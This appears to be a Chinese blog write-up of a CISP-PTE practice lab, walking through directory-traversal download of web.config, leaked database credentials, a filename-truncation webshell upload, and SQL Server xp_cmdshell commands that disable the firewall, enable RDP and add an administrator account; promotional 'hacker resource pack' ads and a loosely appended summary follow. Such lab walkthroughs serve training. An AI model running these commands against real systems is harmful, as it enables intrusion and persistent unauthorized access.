CISP-PTE 靶机,从零基础到精通,收藏这篇就够了!

PTE 靶机:考前热身?别太当真!

开篇絮叨:关于考试,关于靶机,关于“套路”

CISP-PTE 这考试,满分 100,选择题占 20,操作题 50,综合题 30。如果你指望靠这篇“攻略”就能轻松过关,那恐怕要失望了。这篇文章,咱就来扒一扒这操作题,看看这靶机到底是个什么货色。与其说是攻略,不如说是“批判性复现”,咱不光要操作,更要思考这其中的“道道”。

环境搭建:一键启动?小心驶得万年船!

Step 1:解压,这没啥好说的,地球人都知道。

图片

Step 2:VMware 打开?等等,先别急!你真的了解虚拟机的网络模式吗?桥接、NAT、Host-only,选错了可是寸步难行。

图片

默认密码 admin123?这安全性…简直就是裸奔!

图片

登录成功就万事大吉了?少年,too naive!这仅仅是个开始,真正的挑战还在后面。

图片

靶机攻防:按部就班?不如剑走偏锋!
信息收集:别做无头苍蝇,先搞清楚状况!

信息收集是渗透测试的基石,别上来就梭哈。

端口扫描:扫就完了?你得知道扫的是什么!

首先,端口扫描是必须的,看看开了哪些服务,但别只会用工具,要理解端口背后的意义。1433 是 SQL Server,27689 是 Web 服务?OK,记下来,后面有用。

  • 1433:Sql Server 服务
  • 27689:Web服务

图片

文件上传与下载系统?嗅到了熟悉的味道,这绝对是突破口!

图片

目录扫描:御剑出鞘?小心被反杀!

目录扫描是好东西,但别一股脑的全扫,容易被 WAF 拦截。robots.txt 泄露了 affix 目录?Nice!

图片

访问 http://192.168.59.139:27689/robots.txt 发现了 affix 目录,这算不算意外之喜?

图片

http://192.168.59.139:27689/upfile/affix/ 提示列目录失败,这很正常,安全意识还是有的嘛。

图片

http://192.168.59.139:27689/admin/file_down.aspx 缺少参数 file,这不就是传说中的文件下载漏洞吗?

图片

文件下载:步步为营,切忌贪多嚼不烂!

构造参数 file 进行测试,获取 web 网络路径信息,这属于基本操作。

图片

…/ 向上回溯目录?这年头还有这种漏洞,简直是送分题!

图片

最终回溯两层目录到 web 根目录并下载 web.config,这波操作 666!

图片

web.config 泄露数据库账号密码?我的天,这靶机也太良心了吧!

图片

连数据库:手握利器,天下我有!

拿到数据库连接信息,就相当于拿到了一把通往内网的钥匙。

图片

获取 Web 账号密码 admin/asdadwn_d2112,这密码…简直就是侮辱智商!

图片

登录 WEB:不费吹灰之力,拿下 Key1!

使用弱口令登录 WEB 系统,这第一个 Key 拿的也太容易了吧!

图片

成功获取第一个 Key: 4k3s9m3d,感觉这 Key 就像白捡的一样。

图片

GetShell:花式绕过,上传 Webshell!

文件上传功能限制?没关系,我们来花式绕过。

图片

不允许上传?看来还是有点安全意识的。

图片

文件名截断漏洞?这简直是雪中送炭!

图片

利用文件名截断上传 Webshell,这波操作行云流水!

图片

图片

成功连接 Webshell,感觉胜利就在眼前!

图片

在 Web 目录下找到 Key2,这第二个 Key 也是唾手可得。

图片

图片

权限提升:一路开挂,直奔 System!

拿到 Webshell,下一步自然是权限提升。

通过 Webshell 查看当前用户权限,发现是普通用户权限,这很正常。

图片

访问 C 盘下 Administrator 文件夹被拒绝,看来权限提升是必须的。

图片

再次发现历史 web.config,这靶机简直是漏洞百出!

图片

获取 sa 的账号密码信息,这简直是上帝视角!

图片

使用 Navicat 连接数据库,这感觉就像作弊一样。

图片

执行 SQL 语句查看权限,直接就是 system 权限?这…也太容易了吧!SQLServer 默认以 system 权限运行,外加上 sa 权限,简直就是为所欲为。

use master;
exec master..xp_cmdshell "whoami";

图片

关防火墙 & 开 RDP:为所欲为,横行霸道!

拿到 system 权限,接下来就是关闭防火墙、开启 RDP,然后远程登录。

为了执行系统命令,首先开启 XP_cmdshell:

use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;

图片

之后关闭防火墙:

EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'

图片

下一步开启 RDP 进行远程链接:

exec master.dbo.xp_cmdshell 'reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'

图片

为了实现 RDP 远程链接,创建一个用户账号并将其添加到管理员组:

exec master..xp_cmdshell "net user test12 123.com /add"
exec master..xp_cmdshell "net localgroup administrators test12 /add"
exec master..xp_cmdshell "net user test12"

图片

远程连接:胜利会师,拿到 Flag!

使用之前创建的账号进行远程链接操作:

图片

在桌面成功获取到 Key,这第三个 Key 也是轻松到手。

图片

总结:靶机虽好,切莫沉迷!

本篇文章以 CISP-PTE 靶机作为演示实例进行了渗透测试,突出信息收集的重要性以及灵活运用 MSSQL 进行权限提升的技巧?呵呵,别逗了!这靶机简直就是漏洞大礼包,拿到 system 权限就像探囊取物一样。

与其说是渗透测试,不如说是“按图索骥”。这靶机对于入门者来说,或许是个不错的练习,但对于真正想提升技能的人来说,价值并不大。真正的渗透测试,远比这复杂得多,也困难得多。所以,靶机虽好,切莫沉迷,要多学习、多实践,才能真正提升自己的安全技能。
```

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

### CISP-PTE 靶机资源与使用指南 #### 资源获取途径 对于希望参与CISP-PTE靶机测试的学习者而言,可以通过特定链接访问并下载所需的虚拟环境。例如,在线存储服务提供了便捷的下载方式[^1]。 #### 提权操作实践 为了验证系统的安全性以及理解权限提升的过程,可以利用Python搭建简易HTTP服务器来辅助文件传输工作。通过执行如下命令可以在本地启动一个简单的Web服务器用于文件共享[^2]: ```python python2 -m SimpleHTTPServer ``` #### 安装配置指导 针对初次接触此类项目的用户来说,一份详尽的操作手册显得尤为重要。网络上存在一些由社区成员分享出来的文档资料,它们不仅涵盖了从零开始部署整个实验环境的具体步骤,还包含了遇到常见问题时的有效解决方案[^3]. #### 实战案例分析 在实际渗透过程中,可能会涉及到多种技术手段的应用。比如,当面对Windows Server 2003这样的老旧操作系统版本时,除了常规的方法外,还可以尝试利用已知的安全漏洞(如永恒之蓝)来进行深入探索;同时也要注意保护好个人隐私数据安全[^4]. #### 文件管理接口示例 某些情况下,可能需要远程操控目标机器上的文件系统。这里给出了一条具体的URL路径作为例子,展示了如何请求指定ID对应的图片文件进行下载[^5]: `http://example.com/admin/file_down.aspx?file=638596652953750000-111111111.jpg`
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值